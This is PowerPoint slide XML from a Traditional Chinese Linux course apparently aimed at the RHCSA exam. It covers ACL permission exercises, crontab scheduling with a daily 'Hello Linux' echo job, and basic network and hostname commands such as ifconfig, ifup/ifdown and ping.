              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>實作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>範例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06400" y="0"/>
              <a:ext cx="1619640" cy="2121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0560" y="-63360"/>
                <a:ext cx="1651320" cy="224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8003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複製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fstab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>到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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>下方，並</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>fstab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>資料夾的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，規格如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>natasha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>能夠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>讀取與寫入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>fstab</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>harry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>無法寫入或讀取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>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fstab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確認</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/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fstab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>值是否相符</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW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smtClean="0"/>
              <a:t>ACL-RHCSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>實作範例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661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4"/>
            <a:ext cx="8568952" cy="5549901"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="1" dirty="0"/>
              <a:t>循環工作排程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" b="1" dirty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crontab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選</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="1" dirty="0"/>
              <a:t>所有用戶均可操作的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="1" dirty="0" err="1"/>
              <a:t>crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="1" dirty="0"/>
              <a:t>指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>選項</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>：檢查排程列表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：指定使用者身份執行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e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> 新增排程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" sz="1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例行性命令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3918960" y="1548000"/>
              <a:ext cx="744840" cy="1047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03120" y="1484280"/>
                <a:ext cx="776520" cy="23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266560" y="1639440"/>
              <a:ext cx="2384280" cy="198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50720" y="1575720"/>
                <a:ext cx="2415960" cy="14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993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4"/>
            <a:ext cx="8568952" cy="5549901"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>輸入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每天的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>14:23 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>分 顯示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Hello Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的字在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>CLI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>介面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>23(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>) 14(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>時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日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月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>) *(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>週</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> /bin/echo Hello Linux(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令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b="1" dirty="0" smtClean="0"/>
              <a:t>23 14 * * * /bin/echo Hello Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>輸入的參數格式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/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r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>週</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>0,7:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>星期日、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>星期一、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>星期二、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>星期三、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>星期四</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>星期五、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>6:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>星期六</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" sz="1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例行性命令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3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480063"/>
            <a:ext cx="7593855" cy="88693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筆跡 5"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2207520" y="3716280"/>
              <a:ext cx="58824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91680" y="3652920"/>
                <a:ext cx="6199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3017520" y="3703320"/>
              <a:ext cx="61452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001680" y="3639960"/>
                <a:ext cx="6462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3918960" y="3742560"/>
              <a:ext cx="55548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03120" y="3678840"/>
                <a:ext cx="5871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4872600" y="3775320"/>
              <a:ext cx="46404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856760" y="3711600"/>
                <a:ext cx="495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5604120" y="3768480"/>
              <a:ext cx="392040" cy="72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588280" y="3705120"/>
                <a:ext cx="42372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1460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4"/>
            <a:ext cx="8568952" cy="5549901"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" sz="1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例行性命令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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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767" y="1227385"/>
            <a:ext cx="7429657" cy="414583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103760" y="1965960"/>
              <a:ext cx="189720" cy="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87920" y="1902600"/>
                <a:ext cx="2214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1110240" y="2815200"/>
              <a:ext cx="51660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94400" y="2751480"/>
                <a:ext cx="5482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2383920" y="2801880"/>
              <a:ext cx="13104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68080" y="2738520"/>
                <a:ext cx="162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2625840" y="2782440"/>
              <a:ext cx="8496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09640" y="2718720"/>
                <a:ext cx="1170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1221480" y="3788280"/>
              <a:ext cx="26820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205640" y="3724560"/>
                <a:ext cx="29988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3768840" y="4467600"/>
              <a:ext cx="1254240" cy="262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752640" y="4403880"/>
                <a:ext cx="128628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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1175760" y="4859280"/>
              <a:ext cx="17676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59920" y="4795920"/>
                <a:ext cx="2084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筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2286000" y="4800600"/>
              <a:ext cx="255240" cy="198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270160" y="4737240"/>
                <a:ext cx="2869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筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3337560" y="4774320"/>
              <a:ext cx="496800" cy="72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321720" y="4710960"/>
                <a:ext cx="52848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6317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66824"/>
            <a:ext cx="8568952" cy="5549901"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>例行作業並以用戶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>natasha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>身分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>每天的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> 14:23 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>分 顯示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Hello Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>的字在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>CLI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pPr lvl="2"/>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" sz="1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RHCSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>例行性命令實作練習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20880" y="640080"/>
              <a:ext cx="725400" cy="2289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05040" y="576720"/>
                <a:ext cx="757080" cy="355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88616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</a:rPr>
              <a:t>十、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>常用網路指令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1094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err="1" smtClean="0"/>
              <a:t>ifconfig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ifup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ifdown</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="135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83568" y="1412776"/>
            <a:ext cx="7920880" cy="4780106"/>
          </a:xfr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294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6588125" y="6453188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B785955-4835-4515-BAD2-6EF6DAAC9312}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2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165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579296" cy="5258519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看網路</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>組態： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>變更網卡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>IP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ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> eth0 192.168.11.36</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>netmask 255.255.225.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>重新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>啟動網</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>卡</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty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init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/network(networking) restart/start/stop</a:t>
            </a:r>
          </a:p>
          <a:p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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/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3"/>
          <a:srcRect l="673" t="7937" r="39109" b="17981"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115616" y="4077072"/>
            <a:ext cx="7129656" cy="223224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025640" y="2168280"/>
              <a:ext cx="477000" cy="201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09440" y="2104920"/>
                <a:ext cx="50904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2462400" y="2135880"/>
              <a:ext cx="38556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46560" y="2072160"/>
                <a:ext cx="4172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3154680" y="2207520"/>
              <a:ext cx="1346040" cy="396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138840" y="2144160"/>
                <a:ext cx="137772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3298320" y="2233800"/>
              <a:ext cx="1228320" cy="331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282480" y="2170080"/>
                <a:ext cx="126000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3618360" y="2227320"/>
              <a:ext cx="823320" cy="13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02520" y="2163600"/>
                <a:ext cx="8550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4748400" y="2181600"/>
              <a:ext cx="65988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732560" y="2117880"/>
                <a:ext cx="6915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992880" y="3285360"/>
              <a:ext cx="2371320" cy="331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77040" y="3221640"/>
                <a:ext cx="240300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1110240" y="3749040"/>
              <a:ext cx="7479000" cy="85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094400" y="3685680"/>
                <a:ext cx="7510680" cy="212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398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579296" cy="5258519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修改主機名稱</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>內容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>主機名稱，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>hostname </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>對應 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的記錄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sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/network</a:t>
            </a:r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檔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>最早的對應檔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49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3573016"/>
            <a:ext cx="6162675" cy="180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148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284413"/>
            <a:ext cx="77724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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" kern="0" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>二</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>系統介紹及使用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" kern="0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298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579296" cy="5258519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>測</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>主機名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令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hostname</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>ping [DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 名稱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#</a:t>
            </a:r>
            <a:r>
